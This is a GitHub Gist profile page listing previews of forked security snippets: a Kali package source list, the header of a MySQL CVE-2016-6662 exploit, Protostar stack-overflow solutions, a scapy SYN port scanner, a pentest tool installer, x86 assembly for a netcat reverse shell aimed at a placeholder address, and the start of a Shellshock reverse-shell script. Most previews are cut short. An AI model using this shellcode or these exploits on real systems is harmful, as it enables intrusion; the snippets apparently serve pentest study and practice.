Skip to content

Instantly share code, notes, and snippets.

View socketpy's full-sized avatar
🏠
Working from home

d4shz3r0 socketpy

🏠
Working from home
  • d4shz3r0
  • Bali - Indonesia
View GitHub Profile
@socketpy
socketpy / sources.list
Created April 21, 2017 04:23 — forked from pichuang/sources.list
Kali Linux source.list /etc/apt/sources.list
deb http://kali.cs.nctu.edu.tw/ /kali main contrib non-free
deb http://kali.cs.nctu.edu.tw/ /wheezy main contrib non-free
deb http://kali.cs.nctu.edu.tw/kali kali-dev main contrib non-free
deb http://kali.cs.nctu.edu.tw/kali kali-dev main/debian-installer
deb-src http://kali.cs.nctu.edu.tw/kali kali-dev main contrib non-free
deb http://kali.cs.nctu.edu.tw/kali kali main contrib non-free
deb http://kali.cs.nctu.edu.tw/kali kali main/debian-installer
deb-src http://kali.cs.nctu.edu.tw/kali kali main contrib non-free
deb http://kali.cs.nctu.edu.tw/kali-security kali/updates main contrib non-free
deb-src http://kali.cs.nctu.edu.tw/kali-security kali/updates main contrib non-free
=============================================
- Discovered by: Dawid Golunski
- http://legalhackers.com
- dawid (at) legalhackers.com
- CVE-2016-6662
- Release date: 12.09.2016
- Severity: Critical
=============================================
#!/usr/bin/env bash
# Script to reverse engineer the build of a given Debian / Ubuntu server
# I do this all the time: take an existing server, create a Bash / Ansible / Puppet / Chef
# built script, to allow Continuous Depoyment.
# It's tedious, but this script will give you the basics to get started.
# Make sure you have "sudo" access to get all the details.
# setup folders
@socketpy
socketpy / Buffer Overflow Tutorial in Kali.md
Created May 3, 2017 12:11 — forked from apolloclark/Buffer Overflow Tutorial in Kali.md
Buffer overflow demonstration in Kali Linux, based on the Computerphile video
@socketpy
socketpy / protostar.md
Created May 30, 2017 20:49 — forked from Grazfather/protostar.md
exploit-exercises.com protostar solutions

Protostar solutions

Stack

Stack 0

python -c "print 'A'*70" | ./stack0

Stack 1

@socketpy
socketpy / scan.py
Created June 2, 2017 13:03 — forked from garyconstable/scan.py
Python port scanner - TCP SYN (half open) scanning
from scapy.all import sr, IP, TCP
import argparse
import time
class scanner():
def __init__(self, host_start, host_end):
@socketpy
socketpy / thpsetup.py
Created June 11, 2017 18:17 — forked from oaass/thpsetup.py
This will install the additional tools to Kali recommended by "The Hacker Playbook". It will install the tools in /opt/tools
#!/bin/bash
echo ""
echo "=========================================================================="
echo "= Pentest Attack Machine Setup ="
echo "= Based on the setup from The Hacker Playbook ="
echo "=========================================================================="
echo ""
# Prepare tools folder
@socketpy
socketpy / netcat-shellcode.asm
Created June 21, 2017 10:10 — forked from Morgawr/netcat-shellcode.asm
Asm code for a netcat reverse shellcode in x86
jmp short forward
back:
pop esi
xor eax, eax
mov byte [esi + 11], al ; terminate /bin/netcat
mov byte [esi + 14], al ; terminate -e
mov byte [esi + 22], al ; terminate /bin/sh
mov byte [esi + 38], al ; terminate 127.127.127.127
mov byte [esi + 43], al ; terminate 9999
mov long [esi + 44], esi ; address of /bin/netcat in AAAA
#!/usr/bin/env python2
#
# CVE-2014-6271 reverse shell
#
# Same as all the others, just showing off some pwntools.
#
# Usage:
# python shell.py http://host/cgi-bin/script.sh
# python shell.py http://host/cgi-bin/script.sh PORT=12345
#